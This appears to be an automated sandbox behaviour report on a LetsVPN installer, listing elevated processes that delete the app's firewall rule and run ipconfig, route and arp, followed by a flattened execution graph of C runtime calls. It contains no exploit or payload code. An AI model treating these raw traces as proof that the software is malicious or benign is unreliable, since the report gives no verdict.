Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:10:15:13
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:10:15:13
Start date:29/12/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall Delete rule name=LetsVPN
Imagebase:0xa60000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:10:15:14
Start date:29/12/2024
Path:C:\Program Files (x86)\letsvpn\LetsPRO.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
Imagebase:0x680000
File size:247'840 bytes
MD5 hash:3530CB1B45FF13BA4456E4FFBCAE6379
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:59
Start time:10:15:14
Start date:29/12/2024
Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
Imagebase:0x710000
File size:1'588'256 bytes
MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 3%, ReversingLabs
Has exited:true

Target ID:60
Start time:10:15:22
Start date:29/12/2024
Path:C:\Program Files (x86)\letsvpn\LetsPRO.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\letsvpn\LetsPRO.exe"
Imagebase:0x7ff7403e0000
File size:247'840 bytes
MD5 hash:3530CB1B45FF13BA4456E4FFBCAE6379
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                  Start time:10:15:22
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
                                                                                                                                                                                                  Imagebase:0x90000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                  Start time:10:15:25
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                  Start time:10:15:25
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                  Start time:10:15:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiApSrv.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                  Imagebase:0x3b0000
                                                                                                                                                                                                  File size:209'920 bytes
                                                                                                                                                                                                  MD5 hash:9A48D32D7DBA794A40BF030DA500603B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                  Start time:10:15:28
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C ipconfig /all
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                  Start time:10:15:28
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                  Start time:10:15:29
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0xd40000
                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                  Start time:10:15:29
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C route print
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                  Start time:10:15:29
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                  Start time:10:15:29
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:route print
                                                                                                                                                                                                  Imagebase:0x630000
                                                                                                                                                                                                  File size:19'456 bytes
                                                                                                                                                                                                  MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

Target ID:71
Start time:10:15:30
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"cmd.exe" /C arp -a
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:10:15:30
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:10:15:30
Start date:29/12/2024
Path:C:\Windows\SysWOW64\ARP.EXE
Wow64 process (32bit):true
Commandline:arp -a
Imagebase:0xe20000
File size:22'528 bytes
MD5 hash:4D3943EDBC9C7E18DC3469A21B30B3CE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:75
Start time:10:15:36
Start date:29/12/2024
Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
Imagebase:0x70000
File size:1'588'256 bytes
MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true


Execution Graph

Execution Coverage:6.6%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:16.2%
Total number of Nodes:1394
Total number of Limit Nodes:25
17205 180015350 17204->17205 17206 180010c94 _amsg_exit 16 API calls 17204->17206 17207 18001dc10 17205->17207 17206->17205 17211 18001dc39 17207->17211 17208 18001dc8f 17209 180015dc8 _errno 3 API calls 17208->17209 17210 18001dc94 17209->17210 17213 180016cfc _invalid_parameter_noinfo 2 API calls 17210->17213 17211->17208 17212 18001dc63 17211->17212 17485 18001d8e0 17212->17485 17217 18001dc86 17213->17217 17216 18001dc79 17218 180015dc8 _errno 3 API calls 17216->17218 17217->17170 17218->17217 17219 18001dca4 17219->17217 17220 180015dc8 _errno 3 API calls 17219->17220 17220->17210 17222 18001d7c0 17221->17222 17223 18001d7e2 17222->17223 17224 18001d7c5 17222->17224 17242 18001230c 17223->17242 17225 180015dc8 _errno 3 API calls 17224->17225 17226 18001d7d1 17225->17226 17228 180016cfc _invalid_parameter_noinfo 2 API calls 17226->17228 17237 1800152af 17228->17237 17229 18001d800 17230 18001d824 17229->17230 17231 18001d818 17229->17231 17248 18001d5b4 17230->17248 17232 180015dc8 _errno 3 API calls 17231->17232 17235 18001d81d 17232->17235 17234 18001d834 17236 18001d83a 17234->17236 17240 18001d84c 17234->17240 17238 180016cfc _invalid_parameter_noinfo 2 API calls 17235->17238 17239 180015dc8 _errno 3 API calls 17236->17239 17237->17153 17237->17156 17238->17237 17239->17237 17240->17237 17241 180015dc8 _errno 3 API calls 17240->17241 17241->17235 17243 180012322 17242->17243 17247 18001235c 17242->17247 17244 18001a35c _getptd 16 API calls 17243->17244 17245 180012327 17244->17245 17246 18001b814 ___lc_locale_name_func 16 API calls 17245->17246 17245->17247 17246->17247 17247->17229 17249 18001d5e5 17248->17249 17250 18001d613 17249->17250 17251 18001d5fa 17249->17251 17258 18001d5ea std::system_error::system_error 17249->17258 17252 18001230c _LocaleUpdate::_LocaleUpdate 16 API calls 17250->17252 17253 180015dc8 _errno TlsGetValue TlsSetValue DecodePointer 17251->17253 17254 18001d620 17252->17254 17255 18001d5ff 17253->17255 17257 18001d70d _read_nolock 
17254->17257 17262 18001d62e _read_nolock 17254->17262 17256 180016cfc _invalid_parameter_noinfo DecodePointer IsProcessorFeaturePresent 17255->17256 17256->17258 17257->17258 17259 180015dc8 _errno TlsGetValue TlsSetValue DecodePointer 17257->17259 17258->17234 17259->17258 17260 18001d6cb _read_nolock 17260->17258 17261 180015dc8 _errno TlsGetValue TlsSetValue DecodePointer 17260->17261 17261->17258 17262->17258 17262->17260 17263 18001b9cc _isleadbyte_l 16 API calls 17262->17263 17263->17262 17265 18001b81f 17264->17265 17266 18001a35c _getptd 16 API calls 17264->17266 17267 18001b83a 17265->17267 17268 18001b848 17265->17268 17266->17265 17269 18001a35c _getptd 16 API calls 17267->17269 17270 18001b88c _updatetlocinfoEx_nolock 3 API calls 17268->17270 17271 18001b83f 17269->17271 17270->17271 17272 18001b880 17271->17272 17302 180010c94 17271->17302 17272->17193 17275 18001b8dc 17274->17275 17276 18001b89e __addlocaleref 17274->17276 17275->17200 17276->17275 17277 18001b5d8 __freetlocinfo 3 API calls 17276->17277 17277->17275 17279 18001b674 17278->17279 17282 18001b5fb 17278->17282 17280 18001b6c7 17279->17280 17281 180011058 free 3 API calls 17279->17281 17298 18001b6f4 17280->17298 17309 180021de4 17280->17309 17283 18001b698 17281->17283 17282->17279 17285 18001b62e 17282->17285 17289 180011058 free 3 API calls 17282->17289 17286 180011058 free 3 API calls 17283->17286 17287 18001b650 17285->17287 17296 180011058 free 3 API calls 17285->17296 17290 18001b6ac 17286->17290 17291 180011058 free 3 API calls 17287->17291 17289->17285 17295 180011058 free 3 API calls 17290->17295 17297 18001b668 17291->17297 17292 18001b752 17293 180011058 free 3 API calls 17293->17298 17294 180011058 TlsGetValue TlsSetValue DecodePointer free 17294->17298 17299 18001b6bb 17295->17299 17296->17287 17300 180011058 free 3 API calls 17297->17300 17298->17292 17298->17294 17301 180011058 free 3 API calls 17299->17301 17300->17279 17301->17280 17303 180019254 _FF_MSGBANNER 7 API 
calls 17302->17303 17304 180010ca1 17303->17304 17305 1800192c8 _NMSG_WRITE 7 API calls 17304->17305 17306 180010ca8 17305->17306 17307 180010e70 doexit 9 API calls 17306->17307 17308 180010cb9 17307->17308 17310 18001b6e8 17309->17310 17311 180021ded 17309->17311 17310->17293 17312 180011058 free TlsGetValue TlsSetValue DecodePointer 17311->17312 17313 180021dfe 17312->17313 17314 180011058 free TlsGetValue TlsSetValue DecodePointer 17313->17314 17315 180021e07 17314->17315 17316 180011058 free TlsGetValue TlsSetValue DecodePointer 17315->17316 17317 180021e10 17316->17317 17318 180011058 free TlsGetValue TlsSetValue DecodePointer 17317->17318 17319 180021e19 17318->17319 17320 180011058 free TlsGetValue TlsSetValue DecodePointer 17319->17320 17321 180021e22 17320->17321 17322 180011058 free TlsGetValue TlsSetValue DecodePointer 17321->17322 17323 180021e2b 17322->17323 17324 180011058 free TlsGetValue TlsSetValue DecodePointer 17323->17324 17325 180021e33 17324->17325 17326 180011058 free TlsGetValue TlsSetValue DecodePointer 17325->17326 17327 180021e3c 17326->17327 17328 180011058 free TlsGetValue TlsSetValue DecodePointer 17327->17328 17329 180021e45 17328->17329 17330 180011058 free TlsGetValue TlsSetValue DecodePointer 17329->17330 17331 180021e4e 17330->17331 17332 180011058 free TlsGetValue TlsSetValue DecodePointer 17331->17332 17333 180021e57 17332->17333 17334 180011058 free TlsGetValue TlsSetValue DecodePointer 17333->17334 17335 180021e60 17334->17335 17336 180011058 free TlsGetValue TlsSetValue DecodePointer 17335->17336 17337 180021e69 17336->17337 17338 180011058 free TlsGetValue TlsSetValue DecodePointer 17337->17338 17339 180021e72 17338->17339 17340 180011058 free TlsGetValue TlsSetValue DecodePointer 17339->17340 17341 180021e7b 17340->17341 17342 180011058 free TlsGetValue TlsSetValue DecodePointer 17341->17342 17343 180021e84 17342->17343 17344 180011058 free TlsGetValue TlsSetValue DecodePointer 17343->17344 17345 180021e90 17344->17345 
17346 180011058 free TlsGetValue TlsSetValue DecodePointer 17345->17346 17347 180021e9c 17346->17347 17348 180011058 free TlsGetValue TlsSetValue DecodePointer 17347->17348 17349 180021ea8 17348->17349 17350 180011058 free TlsGetValue TlsSetValue DecodePointer 17349->17350 17351 180021eb4 17350->17351 17352 180011058 free TlsGetValue TlsSetValue DecodePointer 17351->17352 17353 180021ec0 17352->17353 17354 180011058 free TlsGetValue TlsSetValue DecodePointer 17353->17354 17355 180021ecc 17354->17355 17356 180011058 free TlsGetValue TlsSetValue DecodePointer 17355->17356 17357 180021ed8 17356->17357 17358 180011058 free TlsGetValue TlsSetValue DecodePointer 17357->17358 17359 180021ee4 17358->17359 17360 180011058 free TlsGetValue TlsSetValue DecodePointer 17359->17360 17361 180021ef0 17360->17361 17362 180011058 free TlsGetValue TlsSetValue DecodePointer 17361->17362 17363 180021efc 17362->17363 17364 180011058 free TlsGetValue TlsSetValue DecodePointer 17363->17364 17365 180021f08 17364->17365 17366 180011058 free TlsGetValue TlsSetValue DecodePointer 17365->17366 17367 180021f14 17366->17367 17368 180011058 free TlsGetValue TlsSetValue DecodePointer 17367->17368 17369 180021f20 17368->17369 17370 180011058 free TlsGetValue TlsSetValue DecodePointer 17369->17370 17371 180021f2c 17370->17371 17372 180011058 free TlsGetValue TlsSetValue DecodePointer 17371->17372 17373 180021f38 17372->17373 17374 180011058 free TlsGetValue TlsSetValue DecodePointer 17373->17374 17375 180021f44 17374->17375 17376 180011058 free TlsGetValue TlsSetValue DecodePointer 17375->17376 17377 180021f50 17376->17377 17378 180011058 free TlsGetValue TlsSetValue DecodePointer 17377->17378 17379 180021f5c 17378->17379 17380 180011058 free TlsGetValue TlsSetValue DecodePointer 17379->17380 17381 180021f68 17380->17381 17382 180011058 free TlsGetValue TlsSetValue DecodePointer 17381->17382 17383 180021f74 17382->17383 17384 180011058 free TlsGetValue TlsSetValue DecodePointer 17383->17384 17385 
180021f80 17384->17385 17386 180011058 free TlsGetValue TlsSetValue DecodePointer 17385->17386 17387 180021f8c 17386->17387 17388 180011058 free TlsGetValue TlsSetValue DecodePointer 17387->17388 17389 180021f98 17388->17389 17390 180011058 free TlsGetValue TlsSetValue DecodePointer 17389->17390 17391 180021fa4 17390->17391 17392 180011058 free TlsGetValue TlsSetValue DecodePointer 17391->17392 17393 180021fb0 17392->17393 17394 180011058 free TlsGetValue TlsSetValue DecodePointer 17393->17394 17395 180021fbc 17394->17395 17396 180011058 free TlsGetValue TlsSetValue DecodePointer 17395->17396 17397 180021fc8 17396->17397 17398 180011058 free TlsGetValue TlsSetValue DecodePointer 17397->17398 17399 180021fd4 17398->17399 17400 180011058 free TlsGetValue TlsSetValue DecodePointer 17399->17400 17401 180021fe0 17400->17401 17402 180011058 free TlsGetValue TlsSetValue DecodePointer 17401->17402 17403 180021fec 17402->17403 17404 180011058 free TlsGetValue TlsSetValue DecodePointer 17403->17404 17405 180021ff8 17404->17405 17406 180011058 free TlsGetValue TlsSetValue DecodePointer 17405->17406 17407 180022004 17406->17407 17408 180011058 free TlsGetValue TlsSetValue DecodePointer 17407->17408 17409 180022010 17408->17409 17410 180011058 free TlsGetValue TlsSetValue DecodePointer 17409->17410 17411 18002201c 17410->17411 17412 180011058 free TlsGetValue TlsSetValue DecodePointer 17411->17412 17413 180022028 17412->17413 17414 180011058 free TlsGetValue TlsSetValue DecodePointer 17413->17414 17415 180022034 17414->17415 17416 180011058 free TlsGetValue TlsSetValue DecodePointer 17415->17416 17417 180022040 17416->17417 17418 180011058 free TlsGetValue TlsSetValue DecodePointer 17417->17418 17419 18002204c 17418->17419 17420 180011058 free TlsGetValue TlsSetValue DecodePointer 17419->17420 17421 180022058 17420->17421 17422 180011058 free TlsGetValue TlsSetValue DecodePointer 17421->17422 17423 180022064 17422->17423 17424 180011058 free TlsGetValue TlsSetValue 
DecodePointer 17423->17424 17425 180022070 17424->17425 17426 180011058 free TlsGetValue TlsSetValue DecodePointer 17425->17426 17427 18002207c 17426->17427 17428 180011058 free TlsGetValue TlsSetValue DecodePointer 17427->17428 17429 180022088 17428->17429 17430 180011058 free TlsGetValue TlsSetValue DecodePointer 17429->17430 17431 180022094 17430->17431 17432 180011058 free TlsGetValue TlsSetValue DecodePointer 17431->17432 17433 1800220a0 17432->17433 17434 180011058 free TlsGetValue TlsSetValue DecodePointer 17433->17434 17435 1800220ac 17434->17435 17436 180011058 free TlsGetValue TlsSetValue DecodePointer 17435->17436 17437 1800220b8 17436->17437 17438 180011058 free TlsGetValue TlsSetValue DecodePointer 17437->17438 17439 1800220c4 17438->17439 17440 180011058 free TlsGetValue TlsSetValue DecodePointer 17439->17440 17441 1800220d0 17440->17441 17442 180011058 free TlsGetValue TlsSetValue DecodePointer 17441->17442 17443 1800220dc 17442->17443 17444 180011058 free TlsGetValue TlsSetValue DecodePointer 17443->17444 17445 1800220e8 17444->17445 17446 180011058 free TlsGetValue TlsSetValue DecodePointer 17445->17446 17447 1800220f4 17446->17447 17448 180011058 free TlsGetValue TlsSetValue DecodePointer 17447->17448 17449 180022100 17448->17449 17450 180011058 free TlsGetValue TlsSetValue DecodePointer 17449->17450 17451 18002210c 17450->17451 17452 180011058 free TlsGetValue TlsSetValue DecodePointer 17451->17452 17453 180022118 17452->17453 17454 180011058 free TlsGetValue TlsSetValue DecodePointer 17453->17454 17455 180022124 17454->17455 17456 180011058 free TlsGetValue TlsSetValue DecodePointer 17455->17456 17457 180022130 17456->17457 17458 180011058 free TlsGetValue TlsSetValue DecodePointer 17457->17458 17459 18002213c 17458->17459 17460 180011058 free TlsGetValue TlsSetValue DecodePointer 17459->17460 17461 180022148 17460->17461 17462 180011058 free TlsGetValue TlsSetValue DecodePointer 17461->17462 17463 180022154 17462->17463 17464 180011058 free 
TlsGetValue TlsSetValue DecodePointer 17463->17464 17465 180022160 17464->17465 17466 180011058 free TlsGetValue TlsSetValue DecodePointer 17465->17466 17467 18002216c 17466->17467 17468 180011058 free TlsGetValue TlsSetValue DecodePointer 17467->17468 17469 180022178 17468->17469 17470 180011058 free TlsGetValue TlsSetValue DecodePointer 17469->17470 17471 180022184 17470->17471 17472 180011058 free TlsGetValue TlsSetValue DecodePointer 17471->17472 17473 180022190 17472->17473 17474 180011058 free TlsGetValue TlsSetValue DecodePointer 17473->17474 17475 18002219c 17474->17475 17476 180011058 free TlsGetValue TlsSetValue DecodePointer 17475->17476 17477 1800221a8 17476->17477 17478 180011058 free TlsGetValue TlsSetValue DecodePointer 17477->17478 17479 1800221b4 17478->17479 17480 180011058 free TlsGetValue TlsSetValue DecodePointer 17479->17480 17481 1800221c0 17480->17481 17482 180011058 free TlsGetValue TlsSetValue DecodePointer 17481->17482 17483 1800221cc 17482->17483 17484 180011058 free TlsGetValue TlsSetValue DecodePointer 17483->17484 17484->17310 17486 18001d920 17485->17486 17487 18001d931 17486->17487 17488 18001d94a 17486->17488 17504 18001d925 17486->17504 17490 180015dc8 _errno 3 API calls 17487->17490 17489 18001230c _LocaleUpdate::_LocaleUpdate 16 API calls 17488->17489 17491 18001d956 17489->17491 17493 18001d936 17490->17493 17494 18001db40 17491->17494 17497 18001d95f 17491->17497 17492 180012200 std::system_error::system_error IsProcessorFeaturePresent 17495 18001dbf3 17492->17495 17496 180016cfc _invalid_parameter_noinfo 2 API calls 17493->17496 17498 18001db4d 17494->17498 17503 18001da37 __crtGetLocaleInfoA_stat _read_nolock 17494->17503 17495->17216 17495->17219 17496->17504 17499 18001d96c __crtGetLocaleInfoA_stat 17497->17499 17497->17503 17501 180015dc8 _errno 3 API calls 17498->17501 17498->17504 17502 180015dc8 _errno 3 API calls 17499->17502 17499->17504 17500 180015dc8 _errno 3 API calls 17500->17504 17501->17504 17502->17504 
17503->17500 17503->17504 17504->17492 17535 18000e703 17534->17535 17536 180002a6a 17534->17536 17537 180015264 setlocale 16 API calls 17535->17537 17536->17110 17536->17111 17537->17536 17539 18000e984 17538->17539 17540 18000ea1a 17539->17540 17545 18000e9fa 17539->17545 17560 1800155f4 17539->17560 17541 1800155f4 _wfsopen 22 API calls 17540->17541 17540->17545 17542 18000ea3c 17541->17542 17542->17545 17577 180015580 17542->17577 17545->16991 17547 180001d1e std::_Lockit::_Lockit 17546->17547 17549 18000df9c std::_Lockit::~_Lockit LeaveCriticalSection 17547->17549 17551 180001d6d 17547->17551 17548 18000df9c std::_Lockit::~_Lockit LeaveCriticalSection 17550 180001e17 17548->17550 17549->17551 17550->16993 17559 180001db4 17551->17559 17791 1800043ec 17551->17791 17554 18001176c std::bad_exception::bad_exception 5 API calls 17555 180001ddd 17554->17555 17556 180011998 _CxxThrowException 2 API calls 17555->17556 17558 180001dee 17556->17558 17557 18000e538 std::_Facet_Register 6 API calls 17557->17559 17558->17557 17559->17548 17561 180015625 17560->17561 17562 18001563c 17560->17562 17563 180015dc8 _errno 3 API calls 17561->17563 17562->17561 17565 180015657 17562->17565 17564 18001562a 17563->17564 17566 180016cfc _invalid_parameter_noinfo 2 API calls 17564->17566 17586 18001dcfc 17565->17586 17576 180015635 _ioinit 17566->17576 17568 18001565c 17569 180015676 17568->17569 17570 180015669 17568->17570 17571 18001567c 17569->17571 17572 18001569e 17569->17572 17573 180015dc8 _errno 3 API calls 17570->17573 17574 180015dc8 _errno 3 API calls 17571->17574 17594 18001e310 17572->17594 17573->17576 17574->17576 17576->17540 17578 1800155a8 17577->17578 17579 1800155bd 17577->17579 17581 180015dc8 _errno 3 API calls 17578->17581 17579->17578 17580 1800155c3 17579->17580 17647 1800154d4 17580->17647 17582 1800155ad 17581->17582 17583 180016cfc _invalid_parameter_noinfo 2 API calls 17582->17583 17585 1800155b8 17583->17585 17585->17545 17592 18001dd15 17586->17592 
17587 18001dd91 17587->17568 17588 18001dd9d 17588->17587 17616 180015828 17588->17616 17591 18001ddce EnterCriticalSection 17591->17587 17592->17587 17592->17588 17609 1800102ec 17592->17609 17612 180010370 17592->17612 17603 18001e355 _wopenfile 17594->17603 17595 18001e377 17597 180015dc8 _errno 3 API calls 17595->17597 17596 18001e523 17596->17595 17599 18001e58b 17596->17599 17598 18001e37c 17597->17598 17600 180016cfc _invalid_parameter_noinfo 2 API calls 17598->17600 17634 180024c18 17599->17634 17601 18001e387 17600->17601 17601->17576 17603->17595 17603->17596 17619 180024c4c 17603->17619 17605 18001e51f 17605->17596 17606 180024c4c LangCountryEnumProc 16 API calls 17605->17606 17607 18001e542 17606->17607 17607->17596 17608 180024c4c LangCountryEnumProc 16 API calls 17607->17608 17608->17596 17610 1800102fa 17609->17610 17611 18001030d EnterCriticalSection 17609->17611 17610->17592 17613 180010382 LeaveCriticalSection 17612->17613 17614 180010375 17612->17614 17615 1800131e4 LeaveCriticalSection 17613->17615 17614->17615 17617 180015843 InitializeCriticalSectionAndSpinCount 17616->17617 17618 18001583c 17616->17618 17617->17591 17618->17617 17620 180024c62 17619->17620 17622 180024cda 17619->17622 17621 180015dc8 _errno 3 API calls 17620->17621 17632 180024c8b 17620->17632 17624 180024c71 17621->17624 17623 180024d1a 17622->17623 17626 180024d39 17622->17626 17633 180024d2a 17622->17633 17625 180015dc8 _errno 3 API calls 17623->17625 17627 180016cfc _invalid_parameter_noinfo 2 API calls 17624->17627 17628 180024d1f 17625->17628 17629 18001230c _LocaleUpdate::_LocaleUpdate 16 API calls 17626->17629 17630 180024c7c 17627->17630 17631 180016cfc _invalid_parameter_noinfo 2 API calls 17628->17631 17629->17633 17630->17605 17631->17633 17632->17605 17633->17605 17637 180024380 17634->17637 17638 1800243ae 17637->17638 17640 1800243c6 17637->17640 17639 180015dc8 _errno 3 API calls 17638->17639 17641 1800243b3 17639->17641 17640->17638 17644 1800243f3 
